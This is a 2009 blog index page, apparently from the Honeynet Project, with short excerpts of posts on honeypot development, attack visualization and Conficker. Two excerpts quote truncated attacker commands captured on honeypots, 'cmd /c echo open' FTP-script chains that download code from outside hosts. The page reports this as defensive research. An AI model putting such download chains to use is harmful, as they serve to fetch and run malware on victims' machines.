Blog

July 26, 2009

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attacker's remote code execution looked like this: WinExec("cmd /c echo open 78.1.96.200 4871 > […]
July 24, 2009

Spanish Chapter Status Report For 2008

ORGANIZATION The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to […]
July 22, 2009

Glastopf’s new vulnerability emulator

The number of attacks against the Webhoneypot depends strongly on its PHP parser. So keeping the pattern matching mechanism up to date was one of the […]
July 21, 2009

Iteolih: If you can’t touch it …

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere. cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo […]
July 14, 2009

Visualization Experiments

Most of my work in the past few weeks has been focusing on the visualization aspect of the project.  One thing that I am trying to […]
July 13, 2009

A review to what we have done yet

Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do a lot more so that our […]
July 11, 2009

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!). SMB / CIFS is […]
July 10, 2009

Conficker.A going down?

Conficker contains a piece of code that has been the object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it […]